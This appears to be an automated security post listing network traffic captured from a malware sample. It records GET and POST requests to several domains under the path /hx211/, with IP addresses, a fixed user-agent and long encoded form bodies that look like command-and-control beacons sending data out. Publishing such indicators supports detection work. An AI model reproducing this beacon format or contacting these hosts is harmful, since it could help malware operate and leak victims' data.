POST /hx211/ HTTP/1.1 Host: www.pneus-bruxelles.com Connection: close Content-Length: 57322 Cache-Control: no-cache Origin: http://www.pneus-bruxelles.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.pneus-bruxelles.com/hx211/ Accept-Language: en-US Accept-Encoding: gzip, deflate T8kD=RF6gl4BIEjRx9tNhYzFs6ByoqZqxFGvpefP9JOaWQeAXPx8tYqhIxgPKYbZ9TmPrwXRNjtE_ivtwbto1O3TiJineJdVCPsDMdJ6urcvmJzJg6P5sckXlQp1y9O1Sin3YgGlx090hDj~-muLMqcqerw3ZgolznafJqSrgFN8aONAORQyuIPwuMiZOMtM4YJwOe3ZB97MxmsTxMDB90LAxAMyWZTgARss-4luuK3OkhBpe~RmQy64tEt0azB2_aYSPmlLBA7XQ4HX8Sdd8lA(3tb6beP3ms_7CtXOp54MjNmcVF3DERIz70I~wP7CXi3grs3X4FBFV3PFprjVTioOXupTBg3UCZ0QYMDj73WdqABtP~w(Vx3hvknd_0-yV8nk8aDUdiigI4m3eLA3rFldv5KnfG3KgVdQLA3o6w_q-MTv2Y2iivY4NkoFE~cxVH1ldpr1kYPNawAQ5TqxGUzohdEOwiVxFgU~jfrCePDRwSfozMcQRe2g_9xxp0O~NnOHaUrjc6s~cFkdULm6rT1hq7nuyohM3g9CHPrHXyc1CnUKBy8iqBqV8jaR5vRI8nsNn3cYGZ63XWLr2vksmJTTlr0D7gBBVvWMQO4kBQT~F7_pv~YGl53Ntc_MqDQF2Ig7xkV9mCbrkkwFWmq9qDlidJrav9AdaLVWu66LG~k14JhlYhWeg3mQ3F9bKViWxOR64NV4QevEjJmzDY_Q3w_bhQW4gH4CkRuzKujMBoUbarVZDfulTtKGuZgWHiYBHaH2nv-ip2ebDSfp5yQkxqqVXJ0NcLLLl0yW1iipZ2f6T3CIX0M6Ry0aqYO3yNKUKNUvGVDJxm00ndWUrdyWi1e(300SVrzNHB7oYEqOH3GqvGBL8x3afwS7BNJQLXK3276xbXGXKg_o7kccrCwEW5_26ocPIoJuVwPi9qLJaPP65f1LVHZO48OufaEpqb7jwt1OjHrsPerrWBlJZs1HH(8KUtk2cOn4yBMj-EFPUk5I8U-AKZFLWVot_s7XJEqr72M51Rn6wDh0jT4PbAabv9M~o4uOSaIA9Pl161svg5gSXSi1a(cgkbg(ZIa53Ar(kPsQWbvT769Nz9IOYPN5Yd_nCLFAr6Tks~kXx4uyd7GYbIxW7Rn54W5RL68x3vRTjJnTHSPIqiHdi8bLKTcAam9fshjAgaUjYmWhXTGrlSTF0InMfv53kHdLETA4RK9oxLx1Vs-vzaEYpZ6Cgp18Ei5VA4hI4uvLgaRb6vdeq8JJrVyte5B2haBfSSiXkV5UMXP8DW0yUDEjz8Qe2kJ5h0CuKlCZEb9kvhmyn95Rk(d6wu7AVswL94IzCO-ZTXQPFzSplwezAbELKpgvaLPtKwA3fHiwcp7TCBdgzHeDmOb(YRYSNS3mvc7P-gWpnB_RM~8tz~HI5GLVWnxGTb2opTfW1YIiw6NeGRf(9sVedG7AfEs8tH3vwjpdF1wNmtlMaML0jCLJMWbA5J02gwdltfDynhHS-eRJipB~HzGoJ~zP8eo36D6X96egEL56FPgB25jdBTPu_ulbQ~Lbhc_w1YmCESHduK57M5Tkj5l4-Qa6K2H(I843rQTnfQRWN~H7XlA2x7lOvSz9llsxByM(Ep3Bskoxbho7-5BFY~eEa~7LkZFkJlX4BICqrwB453VMgrIN2VGQfFeBinNR3df06alxzbIzYD47_hkOmUs58pkqIAzFhxPvLnr29gfWshB~280eBaakrExFLZETPpbsT(LrTxDEOrNWJn-qn6l~xgTsQbXxXeVMfMOl0Ump10RRw9rPhZUyfe307wMyWNQTNkJm7Su0zwpqmuo1RrvA7rLrnejTiE18HEAV40Lwl84vvUSezXqQXAouhmDyA8iqEB8WsdqRxBdKhrl4px8gl9wEoFxKwYd~AZO0i3Zh51DpF2onN(GhX8S6pD6s3L9Z23yiPxCcnSddbuii74zyIPfTeH5t2RwvEhb4CptGaDI08E91w67vLIIweR5VL(3pwCMPQ9j6Spbch26duVtSbu6FzaJbllktUtsSPnBVuwV9RpKhmkt5yFW0wQgdm4_MCIDR6ZWM-01kzjcb1n67S3iQSY5XmhZ9fC_yXYhQ6WP21yRWhbBAXWl9Z8Ct8ckqkagwnqnrzUt8uvqEzpqyq135Spo9gR67opnCq9ISM9-ywN3A2bNlrpVAK4LzEmvVVY80jWYVL(3U86Hf9~q(6YQ6YvqtEl64qkrFV45BkY6I7KRvD9tOtuHsqgQqp7bJHb9HuWcvQPIgM8du2GtzbMRAe2oZ7XKDV(n2O(hzoq35WwPbiWTs49NG12VOgApL8kCbkL1LXxIUTq4n57aAn3k9tVffJ7jCN53pA7L3rFhXug6QtpZXXDe6thSc0alUiX6SdF
http://www.new-igrovyeavtomatiwulcan.com/hx211/?T8kD=fGnJ9hj7R3qSlUGkIZMXxfHNNkaGlEcYY9KGbKXATDe/EDHtOns6EhqRysKScfxX1zSBoR0z&Vnw0Z=-Z2hTbdPQ2dhN4y
- Hostname: www.new-igrovyeavtomatiwulcan.com
- IP Address: 104.31.86.118
- Port: 80
- Count: 1
GET /hx211/?T8kD=fGnJ9hj7R3qSlUGkIZMXxfHNNkaGlEcYY9KGbKXATDe/EDHtOns6EhqRysKScfxX1zSBoR0z&Vnw0Z=-Z2hTbdPQ2dhN4y HTTP/1.1 Host: www.new-igrovyeavtomatiwulcan.com Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.new-igrovyeavtomatiwulcan.com/hx211/
- Hostname: www.new-igrovyeavtomatiwulcan.com
- IP Address: 104.31.86.118
- Port: 80
- Count: 1
POST /hx211/ HTTP/1.1 Host: www.new-igrovyeavtomatiwulcan.com Connection: close Content-Length: 2198 Cache-Control: no-cache Origin: http://www.new-igrovyeavtomatiwulcan.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.new-igrovyeavtomatiwulcan.com/hx211/ Accept-Language: en-US Accept-Encoding: gzip, deflate T8kD=XkrzjGy1BnCn8UeqJ8oPmrvyNUahinI8a4TlSK3NQDKxUw7sFhQabmXJrcCQBvE5uiqLlXViskZeLqqYAIK9AZw3VtSDtg(tm-jLmD1kjawWWG8OkzzeSzfSBUG3RCYyx_OVieNYGQ9kT6bZL8esztC80a45ARlNG8(rNiU0okdaGeo2TGsoZQu2qL9XdtnVhwI-MnuRRDolLTjUxtfU6-298DsoA2XDCTxz5WhWZ39afufEfozJ~A(_FIoZn_mEkCzZIsbsanWSnKURM7KPozDz89dAVOVkpVoJABdWKNGB~Dq2fA(LE8ufgMhOo-rOK-d5SJtqqNQXJ7WUMiHOxRRz9Uzio4kjTTKjOec0GubA4fVTn74SCGZwLJlXNJbP2nusXp3cBMAC2VVXGiDkszJ7rDf8ji5tSPXdeG58vrd5OP2it3uHld9GMkeEu6eMWlESpxQxYibTQaXA8AGK5i~mydmEBKP6eV1DqBv8M12J5jMZ2QlmgOxiTqJW2OZSuKAdzskVjE23zWtBLO2jd6o6rMtDVWrbgFaK9RBE~bA3tS(u4fUpJ3SYtL2a29ommhVvc714vp~JmiZ2TelAdu28fyOIJ0iQacAiOVZPEp3jl4Ev8FAYgPRTv-05ZTGou0TZds9fr5a3umcR0lc6FqVNSCI-4N(odF5PrDhZ4iS0WC7owCqppHqhJlvKg8eTYfDpMvhfJaPYGsb16rknRznOxdfZWEkH(UeiJJKLdtdbyhL_AJlCe5iXuJZ61TiQtTgVoDSjHwQ98kvY0wRi6L7RCI8_K5LEi8N5ix9KqMj-hf9Z8WlD(pfptmpE22B6kBPubfAyqV0dfAK6IOneQfFjXTb_lwHdHrBYqNGbyz31Thth(oFyj2uz(t2fwdO6TWpDNc8A~wesVwRWtaXUG537NkMHEmnB0vzggWUIvqfggd4xwpw3hBxTJZG7w8ynLtRtFLXK2BBRUWYGCi7V2UL_4jcYohXyRDBQL2rL9xcCNhMSNdHJdt7aY46mo3s8fxC8Vb3FN06_1xzh7yujdctrcRpwlWZldVE1g_lv78vD6iRYM505prqh00qleJqWDP68~8BDu42qPaBqZJ70FDCrYXJ_okzKqqwpNyuTGNY4MzdfalgBFyC1hLN0o0fZ9HwNsKXYp38LUNuutI~S~kscRErDDGUWArztvte6KJUhoIj-PG2W42hQ1l(PiPTPo_r1alLvRmpPdWgdhT9gRzBMzUHlJe8OR9JYLGrtyAoYTCqoe9145PkjEr3EZi(8bsFNH-rjTzJ9nwq4IH5Vni01xm6UbUSZhsrOVPyXNgafEUOAvqElvWgZYXXEcXI8z2uotOCaCXMjdBlymB5hLZMFoHJO2vQlzxXotzegP3QX1Os5YsUVGrYkDplVTwksmZZxDpwrU7zUsQULLY4lXU4GIhfVrcyyYsRIEpZyr-3NfglJbsExvqh9dkhM5yVNUUGjh9QO3BL91v7_7EYYn7ykMGaFjV(RVN~7svknnwuogvieiKws79mecMz27pSwvmI4gPZvGyEg3a4ht-r67oPm(Ak2jdJrctO8ggm49gcsEZEYe9Kd2GyVciZ5XLlWPmPsoubl9Nfucfz3XEh6vd6AxSb10iAPSftwOQyD7a(1CCsxgj3kmU~ya-LnEmKP8NdxhmBMSMsdCViEOuCEqc6t~-Ryb8STO6iSoO4gDSqCZO7aGN5F2LB_fkkKphemWeqxgw1dnU3FIyZwwVvdwatY3irTztwd6jbrTYH4b-2itQ86e29CepC33mgNOOIbf_NPzIOvVorwFA2ITo1GSs8JFLDF9xYJqRCiQmZ1k3MXgQKusHoL4pjmU55bAX(dF_ejtB8BP8t25KE5qAYbbj~B1yNez3BtUXA1P9H-u3iZBAIoO8CZtL(yan2yo5kbYJWkJIlpMtrpzYfk~hg3p30y3d7wvE6MUhPEaxLx9EgJrKeubRK1D6G9oRXSB8RwtQdlP-DtkcFmbTAOHvmJKpLmeFWtrmCMmyCphF7R7S7PyGkpdhxakV69ufsa(4KoFgI52dFNoIMty2EFBcPuKObubWQR~LDQwec1u_yrfadcAm7CrYyco-TEP3Mjqr2-Pa9VIWrudVDrVE6B1GQrW8a2~rnBN7tqDA~eOk3jXtDPtmSY2qmbpoVvwfRY4XFPCtt6ar1-s6Ry\x00\x00\x00\x00\x00\x00\x00\x00
http://www.new-igrovyeavtomatiwulcan.com/hx211/
- Hostname: www.new-igrovyeavtomatiwulcan.com
- IP Address: 104.31.86.118
- Port: 80
- Count: 1
POST /hx211/ HTTP/1.1 Host: www.new-igrovyeavtomatiwulcan.com Connection: close Content-Length: 57322 Cache-Control: no-cache Origin: http://www.new-igrovyeavtomatiwulcan.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.new-igrovyeavtomatiwulcan.com/hx211/ Accept-Language: en-US Accept-Encoding: gzip, deflate T8kD=XkrzjESLHXH84SzQN5NIrqfPGEOrrRgDAozTSJ~GYi68DALsDi4RSmXK6sCXFv5QjRqDlWhIskRdAvGZVbumf59EK93d7S3u3cfPtiNk~ZsuJEEFnHbafzDQL0eMKAhmwdiRyLANXhFtf_31Jf~o3dG_srgkDyBZF5S0DCMr3VZqCJUQTEBScQymisYvDLLvrX4-OU~_ahgnPkvM38fl8OGUr2ovESmFM1ljhTZtb2loN9H8cI3CzwPSCJhRpO7CphHRW9bfYQWgs60DPYGXpALdkuNAAu1uuTc3PBd1IMi70jqOfAzTEOzmushMmYznPeEmcochtpUXIZiLFBjNvhQxwgf5~fESTSm3IuU0FoLArstSqb4SMWZ-LJlPNJb22l~gWp(cHMMM2jBNOS7QpTIvqAHinmNBSIybfiB8u4R4FKamlGuE9t5oGEWUu6SHZH8ojwtpZibQYKjX~xHR0XDivqy_A-ivd0RYqmj4L2CdizYjmypqscZFFe50z_1fhKVg6o8plH2hzjgWGKu3e7UFjtNVDDisn0Sr8A1QqJ4jjSim(swlZG6F3p6Yms4juwdoEaN9sp7Js3pJT8YhXceEYUq5BQu-BpMoEVgjAIrevu4JgFs7rNpfl8BAeyewoVDbXuVsovyomXEnrVJdIN5HTWQm(ITdDVtsmFB49FKjOB3w92SZ~3K9IDjws5bwa7~dDvYfOPuoBdPZnI4MBQ3vuZzRV2M6(UXtI5eLSMJb2ij8AolBR5iVhpYjxTeutQREpHOjBH07(n2XnQljn77jAKI0O5r5i61lhxQxuKf5mfddy2lY~IzSrml31GcnkSj-VOQisXMNUzS1Y8bdd_kIFDGishK9JO5ana618XDxcihx5pN67VH32MuAncKvVnZff_Q1rCG2fmE1s7PqJZLQIksTE0vxwfKyg2xph5a_1sEly5torwZQJsSv2dv4D4RuIvHc(RFOVUs6VDu_6ljc(DYqqlb_HlNGJlbQ~mwvbE4-QpfyQOL4baWcj1N1SieMdLXIe0ffwijdjRDOYtVDPx9Bo3dNXHUvjPNwo_DQ~R8RDKsRuMu5iWGEQIjdcPa1mZ1ksaGPDLVgVJ(QDDr9UlJo~VzAquUPOW~TC9Q4NhVfCUMSLjOdh5ZQrk7us00LvoOGlFFFfv6755GqoHIyV2mMNV4PTLLDn-udKNshorWMLlyr3XsQxEGNiezYsNfhW1egWWZVfUxm9iJfMFdY1mzOJNkSc6wrKCTY8y8IIjCHd4AawfoxRqP4fmfbXskRIvu2cCFpogO6KFlnuglctEmBHn~BxMDNI-7pb2anL2K3o_o_gRo0fn3fFUkY3EbYmseYI3oVZRRmuj5JSL592kcl08le7Aj1sS2xMiIP5f4uD-EpfKADSZF7IjxuhocFJ7xLYanIywAQJJRtcEkeECbN(OKvB8VsPcYBtuP3UV9QXdMPsqhRX0pDsnhNUUeZs81ElWbN1-7Wym5O2KmpJH6tiUiGMdqg9cRbr3S85ej7sq5TzcWOYPWVx7~zqnMC7cJyFgds4pch~fLX3JeF~gMymtYIeuewqD(79iIrF8EHArWaznyIaj5XcKBrfWHv1tLdoMHcQK33PFt2g6CtyQe61lsDbZ8pLiep7qzhEQo11SXK71Kweey8DEyK4NQSnGdybPwREGKbKOPAhdqD(ORsdd3DMKnOoPBcPhSFZPDbO49K19NtWGczqnKUS5mNnjNZvCidRhwGhFed(LZVwhfbzNM75EiUHrjDaPG07TMUQgBpccSMmHoqJ78XG4d23MWSXvbGJAKLSqMQbNRPHYOK(S14pQqKJVxD(hhR12OAtF8Kwd7gZ4gBLGDGNvm7qG4aNth2r5M6tgENMA~bph5hsjVNQl1KYt3stWjoE0E5O6romb~HdEHBjdcQQoK2OIA4HZa7wbXm3wY3j1xdzu3djji3OSebOhT06TwIjo~sOyPwGuWSoB(_XO0Ci1NkAcOnrs5neykYGvLLdZDKNw(6rj~TpXCArV3Q3DSFz2gvbzI8k0u_uu0qzJGcICFt3Mw4tKBVxH0rG8LtceykbkJ26LjO3-x2xaOzQfN0D2mSh4acj4bRZWQcjaOmCI5cLk3jAHn0ci6l7WdHS9fyyMy6L7RcJUuSBmPoSPLCihmajrSA7Klv1qlOjjcLIr4TY_B6ksgIEMh6r8DQ78cGyxs2lamZ8Zu9(Anio-9y1J1Q0n1V6GHEf4rYDhOPJFwx17ZSGzrrWfEj8mi34WBKb1nql8xKxBFXJcPysGaTp7em(qzUouMYv3HkgxSpB4~xOHyTJ4kpkr5b(nEkQJ3rLi10w5QJbrRegNTdrwHHljO9mi0dBA5
http://www.subducker.info/hx211/?T8kD=zctPrV9hlD2pRuhUedlGUPaA3RJhzRTZ5u5QxoruYKXLWzwWkMOT1F0LhaSLLRfO+tHGIA7a&Vnw0Z=-Z2hTbdPQ2dhN4y
- Hostname: www.subducker.info
- IP Address: 198.187.30.171
- Port: 80
- Count: 1
GET /hx211/?T8kD=zctPrV9hlD2pRuhUedlGUPaA3RJhzRTZ5u5QxoruYKXLWzwWkMOT1F0LhaSLLRfO+tHGIA7a&Vnw0Z=-Z2hTbdPQ2dhN4y HTTP/1.1 Host: www.subducker.info Connection: close \x00\x00\x00\x00\x00\x00\x00
http://www.subducker.info/hx211/
- Hostname: www.subducker.info
- IP Address: 198.187.30.171
- Port: 80
- Count: 1
POST /hx211/ HTTP/1.1 Host: www.subducker.info Connection: close Content-Length: 2198 Cache-Control: no-cache Origin: http://www.subducker.info User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.subducker.info/hx211/ Accept-Language: en-US Accept-Encoding: gzip, deflate T8kD=7-h11w05yzXZHK1ADLIFCqi18SRQ1wzip5IW24jSfY(UTjQUhYeAhA4Em_eEUSvThfXzHU2oy-IbmKbRHCTKA0J43tQ0LKp7OMAWpPJ3xrWgKEv7ugZihwqgozQKITxauA1ePgTJAgSd~Kr1Zb29ozWP0bO0scUtyosn7xEa2tC-ON2L1HaVkj3LMAMDiZukJ2hGA5acIpPK1ZdV5k8-pNv9AGI0VoyzW6kvrMoXB8q59XRiydzC11SBtazuWzZAW1H5AiZEU0MIaH9MJN2_FJtFofW-t_HZStP-aNF2s1AiTSeEvUVpIdzpxi3eWMC4qqQyUiWq8tvgCCOw7L~AwiKQJeJyHgOcg7W2b2tycIhki50cI-0AHsMysxlaU7pEXtoYWm9jT1OL4C5OuQ(5IKD9BIHongZ6JbAYuuNbv34o6ZUEjv3Uoa2O8enfCYADLYRXyypajsK8t-GNr1JhmCwRbcaWsj88gzDh(wpHXr6ByOAXTDeRkd21m4l-gNnnS9DD6PUwrbbnzq(oN5DxfseMtGrpWWrCjfgHttSycTni7tDW1ua6eZLVXOXtrhL4o1XuL8M6bQ8byMw98_8ydaSR336xu9L2OfA5j04op_oBEfPZrxKHnccDYF(gDk3OsvGgV_Pb06cOoodroP~SVAl5ybytZdEhsBeDmUtpJTsMM8oFxEOUytq0OcJ_9MZFrGIG3p9ZEgqeYrtXTyVY0E2NiIJ-kEtmEm1EHwmjfqrodZMtZDlavMgUAI16aZlQIETT~-jeMGoYFKwxIcFTM3Is2j7Ca84O6OYN~Mvcec6Sl6XezGKVE4wu9KtvAtPv4VAQVJMt5GbhHwZsQ7TozGfRFG30Gtisx8vUu-fW8Qze4rxjXGvW4WCV3Oo_B8F1VMw5MRWIJK3yf57IoHvSvEtSKuyorgewws5C7oZOkPXCUecqmbFudrXBlELGHJ4OpIMJUZZlYReApij_VJJ5Urhnvw5o7AWrr7OENreaZKL5rEkdvcHJIzBivI3dWuy3G_wGNWiG(eEpURxMkL~SMqu7skOb4DAKOphfmhyQC-ptV3(dF8w7vjEu75HeXYKieYKzzs(7Bk74LCqNKil0viT3k2YVZUfAT6UDx5GxJTDzxBapfUbDi2v8hxfajk6wwtCvB5dj7TJHIyo798ejGWUHS_juUKPPfdrX3OhpHUVA~KlfdHvSRMQ46_Qynhe_KR7eh6MBoC(4ubtYBEITcyUDQs0r~ajdCG4_0gn_YDb1HO0zp8EwR2oeySw0XKAMJsCoIE3wgxTLkL8b~tUQ~PcBwOPWIC(_hGxNOW9gq42CBQx1OKe_~CFUQfqHbgAn70CTgBLI6IAU2TiXffiQALMdvwvK5Do3yE7QzAXiSAOYAuspg52ZRVWfKbwJ1ucI59Ozq32o~NgGPpzMw0FjO2L52KwqJDGJ~zuwhITAjHLID3c7TqO97WF08PUiXofa4JamACykoRYLehuFc7iHyFjULRZBBDSWeX7W7mkRVhbUM7ii1NhQ1puTRGJcoylg5h13vGr4VlpK8zYsT5EQz3sjy4hZBObSFdBqkYnvGXrMQMTcWW4k~2GOiI0TVyJRH97LB9gXQ91z3fddL3CHP0glONFOMBAP1-KTEpQiyWKEaldAxaWPhDJDYlGBg546S-buwpsXwEM-6A1Y~Z3GGhWfdGN3Kp6ggmk_AfAYZmZRrusRhHqhDAcCT9aoDeqdT7qQgF0al7TggRsOCiNRqPgM3ZluIIfx2k(KVomjcvAlbPE_al0nSTBd47GWMOKk(IMDPl2qqBB-S4DrRC7mHRiU351gjGqWMzx_CgF5OngI3A4k2-hGGO2Km73N~BmOMHJav1Pxm4j7A3zK(xUCztV3GzPYIs(Klf9Og3gccSgndnU_J6KnseIEiGoXPAGinky9p8LXeN9ULfztkKM65TdTmj8aSCWdpZUY(ZyntS2_SGETGQGP~ILLAk08BOqyUHK0vfVwYBoOvnNEpguQOis4nrlysai9zRBpnjhBKCkXt0LUyj46IfLyXEDPmjLqDO~XoWGrk1TG9tbv6eUUBrWy5LdMpVgcIv4opu1RNi1daSdIrLi-8Dr57jw2mQb7m3S81skiQT~5Hr8u9o66kdaTCywEh4vosiOuZ-PtIFxJJJ6Xg7Q8t4g2uEaWr4cgnNPeo2T7Fkdf\x00DA~eOk3
http://www.subducker.info/hx211/
- Hostname: www.subducker.info
- IP Address: 198.187.30.171
- Port: 80
- Count: 1
POST /hx211/ HTTP/1.1 Host: www.subducker.info Connection: close Content-Length: 57322 Cache-Control: no-cache Origin: http://www.subducker.info User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.subducker.info/hx211/ Accept-Language: en-US Accept-Encoding: gzip, deflate T8kD=7-h11x811DCfDJd_Ua5aGJ6i3Clg8DTdqqAK25TeX5ONUAIUjdqDmg4Fg_eHeyiu(8m-HUeSy-AauPGbWx77IE1E(Os9a7V8Pu9UsK1376yxOi78hxlmiTei9BQXGEt7slFkYSakEhrT8rqab4WLmjCO(8f9s7EXztYviQtG7PeKKeOD1CispDH-Yz8o~bmaegBGHJi1CLXI6-pk~19dgc(AHD1-IL60R4M_25E8OeGLoxhaz9nz8FCoqZTBWgNFCWzHPgt_WDU6VzlkEL63E4cNi4q-nOnbTvWxVNFdqzouECewvURhKuvftS3ccqSRvO9hbGeE9c(gDj~nr-SD1iKDAqtfDWibg7HhdGlyTrVk1KcdK-0ARcMwsxkXU7phXo0EHWljR1yJ4wh-sCjdEKDLEJH9jg1SJaY6vK5brHcrqqdNh7DVwLzVpO~CCY8OKZBLliUcisK7luaev3h9yjgGDf69u3dRgTmh~T4IWsTA0PwtV2OFjv~oi-Q9tYuRQcj14uIY8J7pycyQOYGoD9izjkugTW79uNBns9WYWwej1tPByd~mb8mNdd7j9Q7ls0Djfd07WwxB2-UC8flTaIK10XWHxMyRJP4zwkwFte0sIN(_nF6ei-4PTD(UBEDXkv3rY6TWzYE72b98jMumIRlzzKa1V88Yz0Goi35AMwh6EMBWrFzD1NKeNOxd(uphonh-v5VuFxurZ6IiPwJzjHm4hYYxlzgAEm9AHASjN5noZakiZhNZh8gaeI1cQ5Z2IGiQsuneO2YWEJY_CsxeCXIk0i2CLMY_6NoR(NTiJLad0LbS~mKOL5gVoaQhf5LV4lE6Ds097FzxMDxtb62g3Fn3KGKpdsvA~fnoz-v_zySfm6EWEUPe31LL~sY0X483X9A1bAi1bvy8UrD2riTkinppUeToo3eUmMxn6INsuaGPa6VtnLZ2KPaolxfSWatRv-MWc4N_MxbeqhmECYdQTvtMrg8J5F3lgpW0PYfYJJLYqltGtZPiHWt-pq7jevq5Oo46VxWlzt42SCRa8JyqNcCL(l6m7GpZLeV09yzARftQTFTLBpJctAkYyLrjecOyDbC2nOe7NmLdGQW9AmxM4QSZoCBTdX2NT-QlxcuxOjLzwTCpAUH6tjbihDKPuU~H1titN_J84GVeZHJrooapDFg5WOXdepCZbtjuiJ1eHSBA(tErXHCCQNcr5dM2nwzpACfKuqZjlWvy6oRzEC4sIUwXRf8A~LTUOF8fzmLKbWKKLPsmq-cXX2tT9Bg-RKFOEuLvDVzHvCr5tdId0_Iura4nkdTHRUHJk2ZwAQxDvZ~2ci1oYvuTzC40EOK-UzsDsU~kvlLK3ZkyrnqLQ_b9eZJlsHPimh9C4wiCwmSkTxiQDtQHhqHpQ0O4a6RAmp1SocKG4Sj41tUJSp3L90snBmW0oZ0MFCWQ4DiYq4vVwgPiTRUiR7WT32EsvfM-dq(a4JCqIBO9pgYNdzX4f5zlwE7ZMUV9CBnRFEHBxkR4SDLAG8OEpN5Yg8TOA2l-sAJnrwgiox3TSFItzAcsUJkx028HgLwGedT8DfBmhbugGV(LQvCebm1tx2STy690TStGXtiFFPAvfJBB1tldBV3AGS8xNLV-NC5EuMeEDa8MymXTKn51072tuSMKfF~3laA7Bufa8ph2oTEivDd-n56CfzvOc2NxGqWdhWp4Af45ex9WrssQ4nCYD2wAbcK7Cb2_EMOwmkUG85i6ySUnVy9Ylcs48891LpPT7ju1EbzVdeQzcedcGntjTAFm5JqxK9rMwb53FA6b5ycDWY(oSE(xJx~fzr1xigThP2dLJjdfCFIByy4W36tFTOaI8auXmCi_XFZCq3X2lNb7WinH32cc2M9bYDi8Xoj6yeRwmQkRNDh3InsiJ6Sh5eJxhkYDcC~DsHWznYD5GMAyIcrvk6U63QoAwCV4Yh7Bl-IU3dWi(zyyUAIRfXGd4YeRASMRELTGMxSxg-AjAT8PinYaqi6RHjEUgOVWsbLj2XZEjT9AGjcIrGXO1hcDHd3SSFXzuXLCc9u263jUoV28yMHBzewbQL(q5bMr6FBHPKxrgIRjCkl1Wix_36K-yFDWsjcj9Tbjsk25ydQZU3u6K5QG04mNqNfRORAyj_O70DD2acn2NiNUGKCRyatn84lLnzH9qeE6veSOriHtMTkhq5mL41l6IPlRvseip_VbptKaj0x6LYFYJYHR4sJogyJtLnfXMHC_iWzy8d5UQ5Dy7mJdhLK2rEfB7ubS2r47ncydsJ~gk8FnAIixQwJiFCK8CoMQ8ZxJGYkOZ9otLA1Fcm5XYWY6n_OeJRJ-NNJwVBFvBY(UHd4vsu4Q2Bb-CWVjJAxNLSdTcyXVQOMrbRfiep1LCTxpvuvYAxYi61tdg_TE
#infosec #automation
TheSystem Itself @ 2018-03-22 17:42:04